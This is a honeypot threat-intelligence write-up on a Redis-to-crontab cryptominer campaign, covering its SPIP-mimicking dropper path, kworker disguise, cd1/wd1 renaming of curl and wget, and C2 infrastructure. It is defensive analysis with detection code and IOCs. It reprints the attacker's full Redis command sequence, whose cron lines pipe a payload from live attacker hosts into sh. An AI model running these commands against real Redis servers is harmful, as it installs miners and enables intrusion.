Redis is an in-memory key-value store widely used as an application cache and message queue. When a Redis instance is exposed to the public internet without authentication, an attacker can issue commands that write files into the host filesystem and schedule them to run as cron jobs. The end state is a fully compromised Linux server running a cryptocurrency miner. Trend Micro documented the pattern in 2020; it has been a stable cryptominer kill chain in the wild ever since.
On April 13 and 14, three different IPs in three different countries hit one of our Redis honeypots within thirty hours. Their command sequences were byte-for-byte identical: same twenty-five Redis commands in the same order, same dropper URL, same fallback C2, same typo’d binary names. One toolkit, fired from three locations.
The dropper URL is the interesting part. It looks at first glance like a benign request to a French CMS:
http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker

The first three path segments come from a real piece of CMS infrastructure. The last two are camouflage for a Linux miner. A SOC analyst grepping a request log for wget or curl would find this line. A SOC analyst scanning a list of paths and seeing /plugins-dist/safehtml/... might skip past it. The operator has been serving the same six-file kill chain from the same Google Cloud VM since at least January 25, 2026: eighty days at the time of writing, with no public takedown and no published analysis of the samples. We never fetched anything from their host. urlscan.io's public scan history did the work.
What we observed
Each session opened with a Redis INFO probe, saved the existing database off to backup.db, wiped the keyspace with flushall, and then wrote a series of cron jobs into the in-memory keyspace before forcing them to disk via config set dir plus save. That is the well-documented Redis-to-crontab persistence pattern. Here is the exact form the operator chose:
info
COMMAND
config set dbfilename backup.db
save
config set stop-writes-on-bgsave-error no
flushall
set backup1 "*/2 * * * * cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh"
set backup2 "*/3 * * * * wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh"
set backup3 "*/4 * * * * curl -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh"
set backup4 "*/5 * * * * wd1 -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh"
config set dir /var/spool/cron/
config set dbfilename root
config set dir /var/spool/cron/crontabs
set backup1 "*/2 * * * * root cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh"
set backup2 "*/3 * * * * root wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh"
set backup3 "*/4 * * * * root curl -fsSL http://38.150.0.118/dewfhuewr4r89/98hy67//kworker | sh"
set backup4 "*/5 * * * * root wd1 -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh"
config set dir /etc/cron.d/
config set dbfilename javae
config set dir /etc/
config set dbfilename crontab

The other two sessions, from 211.154.194.36 (China Unicom, Beijing) and 157.245.229.234 (DigitalOcean, US), issued the same commands in the same order. The cron jobs, the URLs, the dbfilename strings, the dir rotations: identical.
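One way to make that comparison mechanical is to hash each session's ordered command list into a fingerprint. A minimal sketch, assuming the sessions have already been parsed into ordered lists of command strings (the truncated sequences below are illustrative, not the full capture):

```python
import hashlib

def toolkit_fingerprint(commands: list[str]) -> str:
    """Collapse an ordered Redis command sequence into a comparable hash."""
    joined = "\n".join(cmd.strip() for cmd in commands)
    return hashlib.sha256(joined.encode()).hexdigest()

# Illustrative, truncated sessions keyed by source IP; real input comes from sensor logs.
sessions = {
    "43.249.251.28":   ["info", "COMMAND", "config set dbfilename backup.db", "save"],
    "211.154.194.36":  ["info", "COMMAND", "config set dbfilename backup.db", "save"],
    "157.245.229.234": ["info", "COMMAND", "config set dbfilename backup.db", "save"],
}

fingerprints = {ip: toolkit_fingerprint(cmds) for ip, cmds in sessions.items()}
# One distinct fingerprint across three source IPs means one toolkit, three launch points.
print(len(set(fingerprints.values())), fingerprints)
```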
That makes this a single toolkit firing from at least three locations within a day and a half. We have four sensors and we recorded three sessions, so we can’t estimate how widely the toolkit is deployed. What we can do is follow the URL.
The dropper URL is wearing a costume
Pull the URL apart:
http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker
└────────────────────┬────────────────┘
│
borrowed from a real CMS, then extended

plugins-dist/safehtml/ is a real directory on every installation of SPIP, a French content management system used by thousands of news, education, and government sites. plugins-dist is where SPIP ships the plugins it bundles by default. safehtml is the bundled XSS sanitizer. Inside safehtml/ there is a real lang/ subdirectory holding language pack files. You can verify this yourself by visiting any open SPIP install. For example, vindetahiti.com/plugins-dist/safehtml/ shows the plugin directory listing exactly as it appears in the SPIP source repository.
Then the URL invents two segments: font/ and kworker. SPIP’s safehtml plugin has no font directory and no kworker file. The first three path segments are genuine CMS infrastructure. The last two are the payload, smuggled in.
The camouflage targets log review more than scanners. A log line that reads GET /plugins-dist/safehtml/lang/font/kworker looks, at a glance, like a CMS request. A SOC analyst grepping for wget and curl will find it. A SOC analyst scrolling past a list of HTTP requests on a server that hosts a real SPIP install, or has ever hosted one, might not.
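That gap is cheap to close if you know which CMS paths belong on which hosts. A minimal sketch of the corresponding log check, assuming a combined-format access log at a hypothetical path; the prefix and the inventory flag are the only campaign-specific inputs:

```python
import re

LOG_PATH = "/var/log/nginx/access.log"      # hypothetical path; point at your web tier's log
SUSPECT_PREFIX = "/plugins-dist/safehtml/"  # legitimate only on hosts actually serving SPIP
HOST_RUNS_SPIP = False                      # set per host from your asset inventory

if not HOST_RUNS_SPIP:
    with open(LOG_PATH) as log:
        for line in log:
            # Pull the request path out of a combined-format log line.
            match = re.search(r'"(?:GET|POST|HEAD) (\S+)', line)
            if match and match.group(1).startswith(SUSPECT_PREFIX):
                print("SPIP-shaped request on a non-SPIP host:", line.rstrip())
```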
The binary name is doing the same job at a different layer. kworker is what the Linux kernel calls its per-CPU worker threads. On a healthy box, ps auxf is full of [kworker/0:1], [kworker/u8:2], and so on. Calling your dropper kworker is a bet that whoever runs ps next will see it as a kernel thread and skip past it.
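The disguise has a clean tell, though. Real kworker entries are kernel threads, which is why ps shows them in brackets: their /proc/<pid>/cmdline is empty. A userland binary that merely calls itself kworker has a non-empty cmdline. A minimal sketch of that check, walking /proc directly:

```python
import os

# Kernel threads have an empty /proc/<pid>/cmdline; a userland impostor does not.
for pid in filter(str.isdigit, os.listdir("/proc")):
    try:
        with open(f"/proc/{pid}/comm") as f:
            comm = f.read().strip()
        with open(f"/proc/{pid}/cmdline", "rb") as f:
            cmdline = f.read()
    except OSError:
        continue  # process exited while we were walking the table
    if comm.startswith("kworker") and cmdline:
        print(f"pid {pid}: comm={comm!r} but cmdline is non-empty -- not a kernel thread")
```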
The staging tree
We never fetched anything from the operator’s host. Everything below came from urlscan.io’s public API: 91 historical scans against page.ip:34.70.205.211, each one preserving the HTTP response metadata that urlscan’s own sandbox recorded. Reading the scan results is how you analyze active malware infrastructure without touching it.
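For anyone who wants to reproduce the collection, the search endpoint is public. A minimal sketch using the requests library (unauthenticated queries work but are rate-limited; an API key goes in the API-Key header):

```python
import requests

# Enumerate urlscan.io's historical scans of the staging host.
resp = requests.get(
    "https://urlscan.io/api/v1/search/",
    params={"q": 'page.ip:"34.70.205.211"', "size": 100},
    timeout=30,
)
resp.raise_for_status()
for hit in resp.json()["results"]:
    # Each hit links to a full result document holding the response
    # sizes, content-types, and hashes used in the table below.
    print(hit["task"]["time"], hit["page"]["url"], hit["result"])
```

The same query language accepts page.asn: filters, which is the hook for the ASN-level alerting suggested at the end of this post.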
The /plugins-dist/safehtml/lang/font/ directory on the operator’s server holds six files, not one:
| File | Size | Content-Type | Role |
|---|---|---|---|
| kworker | 36,273 B | text/plain | Shell script installer (the cron-fetched payload) |
| cr.sh | 4,306 B | text/x-sh | Bootstrap shell script |
| cb.txt | 4,421 B | text/plain | Config, plain text |
| javae | 5,685,096 B | application/octet-stream | Compiled Linux binary (size consistent with the xmrig family) |
| 1.0.5.tar.gz | 351,866 B | application/x-gzip | Versioned archive |
| pnscan-1.14.1.tar.gz | 74,429 B | application/x-gzip | Bundled parallel port scanner |
Two things snap into focus once you see the tree.
First, javae is not a random string. Look back at the Redis commands above and find the line config set dbfilename javae. The operator writes the RDB output on the victim with the same filename they use for the miner binary on the C2. It’s a naming convention, not a typo. When the cron-fetched kworker shell script eventually downloads the miner and drops it somewhere on disk, it knows where to look. This is the kind of consistency that shows up when a toolkit is authored once and reused everywhere.
Second, this is a wormable campaign, not just a miner drop. The pnscan-1.14.1.tar.gz entry is pnscan, a real open-source parallel port scanner written by Peter Eriksson. It has legitimate uses, but when a cryptominer installer ships pnscan alongside its payload, the purpose is propagation: the infected host gets the scanner, uses it to find the next unauth Redis instance on the internet, and delivers the same install chain there. Each victim becomes a scanner for the next victim. The three sessions we recorded may not be the operator running the campaign directly. Two of them, or all three, may be infected hosts that the campaign turned into propagators and pointed at one of our sensors by accident.
1.0.5.tar.gz is a versioned archive. We don't know what it contains from urlscan metadata alone, but a version number that has reached .5 at the patch level suggests an actively maintained component. Whoever wrote this is iterating.
Running since January
urlscan’s earliest scan of this infrastructure is cb.txt on 2026-01-25T21:34:23Z. The most recent is kworker on 2026-04-06T11:33:05Z. The same IP, the same URL path, the same filenames, for roughly 80 days.
Over those 80 days:
- 91 urlscan scans against the IP across all six files.
- urlscan's ML engine flagged every file malicious, at scores ranging from 21 (for javae, the compiled binary) to 79 (for the two tarballs).
- No public takedown from Google Cloud. The primary C2 34.70.205.211 is a GCE VM in us-central1 (Council Bluffs, Iowa), reverse DNS 211.205.70.34.bc.googleusercontent.com. 80 days of public evidence on urlscan, and the VM is still the live address in cron jobs reaching our honeypots as of this week.
- No public analysis of the samples. We searched for all six SHA256 hashes across the indexed web: zero hits. No VirusTotal hits, no MalwareBazaar, no security vendor write-ups. This is a miner campaign running on a major cloud with a public-evidence trail, and nobody has looked at the samples yet.
The operator also put real thought into the server: the HTTP response headers show Server: Apache/2.4.66 (Debian). That is a deliberately deployed Debian VM running a patched Apache, not an improvised Python http.server on a burn box. Somebody is maintaining this.
Two providers for redundancy
The cron jobs point to two distinct hosts:
| Role | IP | ASN | Provider | Location |
|---|---|---|---|---|
| Primary | 34.70.205.211 | AS396982 | Google Cloud | Council Bluffs, Iowa |
| Fallback | 38.150.0.118 | AS174 | Cogent Communications | Salt Lake City, Utah |
The interesting structural detail is where the fallback shows up. Four cron jobs in the first pass, all pointing at the GCP host. Then the operator switches to root-level cron (/var/spool/cron/crontabs, dbfilename root) and writes another four jobs. Three of them point at the GCP host; only backup3 in that second pass points at the Cogent host.
set backup3 "*/4 * * * * root curl -fsSL http://38.150.0.118/dewfhuewr4r89/98hy67//kworker | sh"
^^^^^^^^^^^^^^
different host

One cron job in eight, on the root crontab only, every four minutes. That is a deliberate low-volume fallback. The operator wants the GCP host to take all the traffic and wants at least one job, on at least one persistence target, fetching from somewhere else in case Google eventually takes the primary down. The dewfhuewr4r89/98hy67// path on the fallback even has a double slash, which is harmless to most HTTP servers but makes the URL visually distinct from the GCP one in a way that suggests the two were authored separately.
Two binaries that don’t exist (yet)
Look at the cron commands again and you’ll notice two of them call binaries that aren’t in any standard Linux distribution:
*/2 * * * * cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh
*/5 * * * * wd1 -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh

cd1 -fsSL and wd1 -q -O-. The flags match curl and wget exactly. The binary names don't.
These are placeholders. The intended sequence is:
- The cron job runs and tries cd1. On a fresh box, that fails because cd1 doesn't exist, but the second cron job (every three minutes) uses the real wget, and it succeeds. The dropper script runs.
- The dropper script, among other things, moves /usr/bin/curl to /usr/bin/cd1 and /usr/bin/wget to /usr/bin/wd1.
- From that point on, all four cron jobs work, but now they're calling cd1 and wd1. A defender running auditd or falco rules that watch for wget/curl execution sees nothing. A defender grepping /etc/crontab for wget finds the two unrenamed jobs but misses the other two.
The technique isn’t novel. It’s been described in writeups going back to 2020 and reappears in 2025 reporting on cryptominer botnets. What’s worth seeing is the technique in the wild, written into a cron job that won’t actually work until the dropper has executed once. The cron jobs are designed to survive the dropper, not just trigger it.
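Once the rename has happened, though, the compromise is easy to confirm from the host itself: the renamed binaries are in PATH and the crontabs reference them. A minimal post-hoc check, sketched under the assumption of Debian-family cron locations:

```python
import glob
import shutil

# The renamed downloaders are the cleanest post-infection artifact.
for name in ("cd1", "wd1"):
    path = shutil.which(name)
    if path:
        print(f"renamed downloader on disk: {name} -> {path}")

# Cron locations matching the operator's dir rotations, plus the system crontab.
cron_files = (["/etc/crontab"]
              + glob.glob("/etc/cron.d/*")
              + glob.glob("/var/spool/cron/*")
              + glob.glob("/var/spool/cron/crontabs/*"))
for cron_file in cron_files:
    try:
        # errors="replace" tolerates the RDB binary framing around the cron lines.
        with open(cron_file, errors="replace") as f:
            content = f.read()
    except OSError:
        continue  # directory entry or permissions; skip
    for needle in ("cd1 ", "wd1 ", "/plugins-dist/safehtml/"):
        if needle in content:
            print(f"{cron_file}: matches {needle!r}")
```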
What we can’t say
We have four sensors. We recorded three sessions over 30 hours. That’s enough to characterize the toolkit and, with urlscan’s public history, enough to characterize the operator’s staging infrastructure. It is not enough to characterize how widely the toolkit is deployed or how many hosts have been infected.
We did not fetch any of the files. Everything in the staging-tree table came from urlscan’s sandbox captures. We have sizes, content-types, HTTP statuses, and SHA256 hashes, but we have not read the contents. We can’t confirm javae is a cryptominer from the bytes alone (we’re inferring from the size range and the context), and we can’t link any of the samples to a named malware family without someone doing proper binary analysis from a sandbox. The hashes are public now. If a vendor reads this and uploads the samples to a real analysis pipeline, the write-up should be theirs.
We can’t attribute the toolkit to any named campaign. The cd1/wd1 rename is consistent with multiple reported cryptominer botnets, but the technique is shared across families. The specific combination of SPIP-mimicking paths + GCP staging + javae dbfilename naming + bundled pnscan + dual-provider C2 is a fingerprint, but it’s a fingerprint we observed, not a fingerprint we matched to a known operator.
What we can say: three different IPs in three different ASNs sent us the same byte sequence. The operator’s infrastructure has been running on Google Cloud for at least 80 days with zero public analysis and zero takedown. The staging directory contains a six-file kill chain including a propagator. The same operator is writing RDB filenames on victim hosts that match binary names on their own C2. If you run a Redis instance on a public IP, the lessons are the boring ones: bind to localhost, set requirepass, run with --protected-mode yes. If you run a SOC: a request to /plugins-dist/safehtml/lang/font/kworker on any host that isn’t actually running SPIP is worth a second look. So is any cron job that calls cd1 or wd1.
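The boring lessons are also checkable in a few lines. A minimal self-audit sketch with redis-py, for instances you own (add password= once requirepass is set):

```python
import redis

# Audit a Redis instance you own for the exposure this campaign depends on.
r = redis.Redis(host="127.0.0.1", port=6379, socket_timeout=5)

for directive in ("bind", "protected-mode", "requirepass"):
    print(directive, "=", r.config_get(directive))

# Red flags: bind containing 0.0.0.0 or *, protected-mode "no", an empty requirepass.
```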
If you run a public cloud or GPU compute platform: the operator above used a Google Cloud VM as primary C2 for 80 days with a public-evidence trail and no takedown. Tenant abuse-handling latency is part of the threat model whether you instrument for it or not. urlscan’s public scan history is one of the few defender-side signals that crosses tenant boundaries; subscribing the abuse-response team to alerts on your own ASN serving malware-pattern paths is one of the cheapest tenant-side controls available.
Indicators of compromise
All of the below are observable without touching operator infrastructure. Hashes come from urlscan’s public scan record, IPs from our session corpus plus urlscan’s host records, and URL paths from the Redis command sequences we observed.
Hosts
34.70.205.211 (AS396982, Google Cloud, us-central1, primary C2)
38.150.0.118 (AS174, Cogent Communications, Salt Lake City, fallback C2)

Source IPs observed delivering the payload to our sensor
43.249.251.28 (AS CORETEL NETWORKS INTERNATIONAL, Singapore)
211.154.194.36 (AS China Unicom Beijing, China)
157.245.229.234 (AS DigitalOcean, United States)

URLs
http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker
http://34.70.205.211/plugins-dist/safehtml/lang/font/cr.sh
http://34.70.205.211/plugins-dist/safehtml/lang/font/cb.txt
http://34.70.205.211/plugins-dist/safehtml/lang/font/javae
http://34.70.205.211/plugins-dist/safehtml/lang/font/1.0.5.tar.gz
http://34.70.205.211/plugins-dist/safehtml/lang/font/pnscan-1.14.1.tar.gz
http://38.150.0.118/dewfhuewr4r89/98hy67//kworker

File hashes (SHA256)
kworker 92a71778310bf37cf81c8f42a250ea7b9ed17042b577d90f5d179f90ac1c056a
cr.sh 72ec88c4f57ff222abe8a49809e149cb68daa1bbf77147b946f3e0cbfcf411ae
cb.txt 9041e709883ce89f6ce9dbf4aa147e577ef28ce0744d1a20705fbe5d878d9005
javae 1ff55eafdba615287f423eab3257ad24b070be1a6e63aa91f06d0ba16d001b60
1.0.5.tar.gz 16ac8c14e7c5d9b0e573f42125b2c41fa0627243a84fcf37fc1d166ab824b64e
pnscan-1.14.1.tar.gz d7c569900cd7cdcaafdc0de74de12cc44988f7ad76917b5a2c224aa9de5fc3f8

Detection strings
config set dbfilename javae
config set dbfilename crontab
cd1 -fsSL (renamed curl)
wd1 -q -O- (renamed wget)
/plugins-dist/safehtml/lang/font/ (SPIP-mimicking dropper path)

Server fingerprint
Server: Apache/2.4.66 (Debian)

Acknowledgments
urlscan.io makes this kind of analysis tractable; every byte in the staging-tree section came from their public scan history without our infrastructure ever touching the operator’s host. Trend Micro (2020) and The Hacker News (2025) framed the cd1/wd1 binary-rename pattern across cryptominer families. The honeypot runs a fork of Beelzebub by Beelzebub.AI, extended for AI-targeted telemetry. The activity above was recorded against deception infrastructure; no real Redis instance was compromised.